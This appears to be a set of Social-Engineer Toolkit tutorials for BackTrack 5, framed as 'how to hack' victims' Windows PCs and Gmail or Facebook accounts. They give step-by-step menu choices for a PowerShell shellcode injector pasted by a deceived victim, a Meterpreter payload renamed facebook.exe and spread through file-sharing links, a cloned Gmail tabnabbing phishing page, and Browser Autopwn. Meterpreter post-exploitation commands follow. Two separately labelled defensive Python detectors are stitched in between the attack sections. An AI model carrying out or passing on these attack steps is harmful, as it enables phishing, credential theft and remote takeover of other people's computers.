Hack Windows7 PC using Powershell Attack Vector in Social Engineering Toolkit (Bypassing Antivirus)

The Powershell Attack Vector module allows you to create PowerShell-specific attacks. These attacks use PowerShell, which is available by default on every Windows version from Vista upwards. PowerShell provides a fruitful landscape for deploying payloads and performing functions that are not triggered by preventative technologies. The module offers:

  • Powershell Alphanumeric Shellcode Injector
  • Powershell Reverse Shell
  • Powershell Bind Shell
  • Powershell Dump SAM Database

Open your BackTrack terminal and type cd /pentest/exploits/set

Now open the Social Engineering Toolkit (SET): ./set

Now choose 1, “Social-Engineering Attacks”.

Now choose 10, “Powershell Attack Vector”.

Now choose 1, “Powershell Alphanumeric Shellcode Injector”, and type the IP address of your PC for the reverse connection.

Now create the exploit code for 32- and 64-bit Windows:

Now retrieve the PowerShell code that SET created. It is saved in /pentest/exploits/set/reports/powershell/x64_powershell_injection.txt

Now send the x64_powershell_injection.txt file to the victim via chat, email or any other social engineering technique and convince the victim to open x64_powershell_injection.txt and paste its contents into a Windows 7 command prompt.

Now you have access to the victim’s PC. Use “sessions -l” to list the sessions and note the session number, then type “sessions -i ID”.

Hack Remote PC using Payload in BackTrack 5

Open your BackTrack terminal and type cd /pentest/exploits/set

Now open the Social Engineering Toolkit (SET): ./set

Now choose option 1, “Social-Engineering Attacks”.

Now choose option 4, “Create Payload and Listener”.

Now choose 2, “Windows Reverse_TCP Meterpreter”; there are several to choose from, including your own program.

Now choose 2, “shikata_ga_nai”.

Now choose a port for the listener. In this case the port is 443, and then I chose Yes to start the listener.

Now a file named msf.exe has been created; you can find it in the file system under /pentest/exploits/set/msf.exe

Now rename the file to anything you want. In my case I am renaming it to facebook.exe

Now upload your exe to a file sharing website like FileSonic, RapidShare or MegaUpload. In my case I am using 4shared.com. Now send the link to the victim.

As soon as the victim downloads and executes facebook.exe, you have access to the victim’s PC.

Use “sessions -l” to list the sessions and note the session number. Now type “sessions -i ID”.

How to Hack Gmail, Facebook with Backtrack 5

First open your BackTrack terminal and type ifconfig to check your IP.

Now, in the BackTrack terminal, type cd /pentest/exploits/set

Now open the Social Engineering Toolkit (SET): ./set

Now choose option 2, “Website Attack Vectors”.

In this option we will select option 4, “Tabnabbing Attack Method”.

In this option we will choose option 2, “Site Cloner”.

Enter the URL of the site you want to clone, in this case //www.gmail.com, and hit enter. SET will clone the website. Press return to continue.

Now shorten your URL with goo.gl and send the link to your victim via email or chat.

When the victim opens it in their browser, they see a message that the page is still loading, so they open another tab. As soon as the victim opens a new tab, the fake website starts working: its script redirects the victim to the phishing page you created.
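A static check for the behaviour just described, as an added example that is not part of this tutorial or of SET: it parses a page’s inline scripts and on* handlers and flags a page only when a focus-loss hook and a navigation sink appear together. The regexes are a heuristic of my own, and both sample pages are constructed fixtures, not SET’s templates.

```python
import re
from html.parser import HTMLParser
from typing import List, Tuple

# A tab-nabbing page waits until the tab loses focus, then navigates elsewhere.
# Both halves must be present in the same script or handler to raise a hit.
FOCUS_LOSS = re.compile(r"\b(?:onblur|blur|focusout|visibilitychange|document\.hidden)\b", re.I)
NAVIGATION = re.compile(
    r"(?:\blocation\s*(?:\.href|\.replace|\.assign|=)|document\.location|window\.open)", re.I)


class ScriptCollector(HTMLParser):
    """Collects inline <script> bodies and on* attribute handlers from a page."""

    def __init__(self) -> None:
        super().__init__()
        self._in_script = False
        self.scripts: List[str] = []
        self.handlers: List[Tuple[str, str]] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append("")
        for name, value in attrs:
            if name.startswith("on") and value:
                self.handlers.append((name, value))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data


def tabnabbing_indicators(html: str) -> List[str]:
    """Return the suspicious script/handler snippets found in a page, empty if none."""
    parser = ScriptCollector()
    parser.feed(html)
    hits = [s.strip() for s in parser.scripts if FOCUS_LOSS.search(s) and NAVIGATION.search(s)]
    hits += [f"{n}={v}" for n, v in parser.handlers
             if n in ("onblur", "onfocusout") and NAVIGATION.search(v)]
    return hits


# Constructed fixtures: the positive one mirrors only the behaviour described above.
BENIGN = '<html><body><script>document.title = "Inbox";</script></body></html>'
SUSPECT = ('<html><body><script>window.addEventListener("blur", function () {'
           ' location.replace("/signin.html"); });</script></body></html>')

if __name__ == "__main__":
    for name, page in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, "->", tabnabbing_indicators(page) or "no indicators")
```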

How to Hack Windows XP in LAN using Backtrack 5

The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was written by David Kennedy (ReL1K) and, with a lot of help from the community, it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization, used during a penetration test.

Requirements

  • BackTrack 5
  • Windows XP machine (target)

Open your BackTrack terminal and type cd /pentest/exploits/set

Now open the Social Engineering Toolkit (SET): ./set

Now choose 2, “Website Attack Vectors”.

In this option we will choose 2, “The Metasploit Browser Exploit Method”, because we will attack via the victim’s browser.

Now choose 1, “Web Templates”, to have SET create a generic webpage to use.

Now choose 2. In this tutorial I will use Gmail, but if you think Facebook, Twitter or Google is better because it is the most accessed website, just change it to whatever you want.

Now choose 22, “Metasploit Browser Autopwn”, to load every vulnerability known to the Social Engineering Toolkit. This launches all the exploits in the toolkit’s database.

Now choose 2, “Windows Reverse_TCP Meterpreter”; there are several to choose from, including your own program.

Set the connect-back port to the attacker computer. In this example I use port 1234, but you can change it to 1456, 4521, etc.

Now it creates the backdoor program, encodes and packs it, creates the website you want to use and starts a listening service waiting for people to connect. When done, your screen will look like this:

When the link is given to the user, the victim sees a look-alike Gmail (fake website). When the page loads, it also loads all the malicious scripts that attack the victim’s computer.

On the attacker computer, if there is any vulnerability in the victim’s browser, a session value is returned, meaning the exploit successfully attacked the victim’s computer. In this case the exploit creates a new fake process named “Notepad.exe”.

You now have access to the victim’s PC. Use “sessions -l” to list the sessions and note the session number, then type “sessions -i ID”.
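Both the facebook.exe payload earlier on this page (an executable run from a download folder that calls back on port 443) and the Autopwn session above (a fake “Notepad.exe” that holds the Meterpreter connection) share one host-side tell: a process that should not be talking to the network opens an outbound TCP connection. The example below, added here and not from this tutorial or from SET, correlates constructed Sysmon-style process-creation and network-connection events by PID and raises an alert for either case; the allow-list, path list and sample events are assumptions to tune for your own environment.

```python
from typing import Dict, List

# Programs that have no business opening outbound TCP connections (assumption:
# a starter list, tune for your environment).
NO_NETWORK_IMAGES = {"notepad.exe", "calc.exe", "mspaint.exe"}
# Locations where a downloaded, user-run payload typically lives (assumption).
USER_WRITABLE_DIRS = ("\\downloads\\", "\\appdata\\local\\temp\\", "\\desktop\\")


def suspicious_connections(events: List[Dict]) -> List[str]:
    """Correlate process-creation and network events by PID and return alert strings."""
    started: Dict[int, Dict] = {}   # pid -> most recent process-creation event
    alerts: List[str] = []
    for ev in events:
        if ev["type"] == "process":
            started[ev["pid"]] = ev
        elif ev["type"] == "network":
            proc = started.get(ev["pid"], {"image": ev.get("image", "?")})
            image_path = proc["image"]
            image_name = image_path.rsplit("\\", 1)[-1].lower()
            where = f'{image_name} (pid {ev["pid"]}) -> {ev["dst"]}:{ev["dst_port"]}'
            if image_name in NO_NETWORK_IMAGES:
                alerts.append(f"non-network program connecting out: {where}")
            if any(d in image_path.lower() for d in USER_WRITABLE_DIRS):
                alerts.append(f"binary from user-writable path connecting out: {where}")
    return alerts


# Constructed Sysmon-style events (IDs 1 and 3), not real telemetry. The first pair
# is a browser doing ordinary HTTPS; the other two mirror the page's two scenarios.
SAMPLE_EVENTS = [
    {"type": "process", "pid": 412, "image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe"},
    {"type": "network", "pid": 412, "dst": "203.0.113.10", "dst_port": 443},
    {"type": "process", "pid": 980, "image": "C:\\Users\\bob\\Downloads\\facebook.exe"},
    {"type": "network", "pid": 980, "dst": "192.0.2.5", "dst_port": 443},
    {"type": "process", "pid": 1204, "image": "C:\\Windows\\System32\\notepad.exe"},
    {"type": "network", "pid": 1204, "dst": "192.0.2.5", "dst_port": 1234},
]

if __name__ == "__main__":
    for alert in suspicious_connections(SAMPLE_EVENTS):
        print(alert)
```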

ps

The ‘ps’ command displays a list of running processes on the target.

ls

As in Linux, the ‘ls’ command lists the files in the current remote directory.

shell

The ‘shell’ command presents you with a standard shell on the target system.

meterpreter> help: the ‘help’ command, as may be expected, displays the Meterpreter help menu.
meterpreter> sysinfo: displays system information about the target.
meterpreter> background: the ‘background’ command sends the current Meterpreter session to the background and returns you to the msf prompt.
meterpreter> migrate: migrates the session to another process on the victim.
meterpreter> download: the ‘download’ command downloads a file from the remote machine.
meterpreter> getuid: running ‘getuid’ displays the user that the Meterpreter server is running as on the host.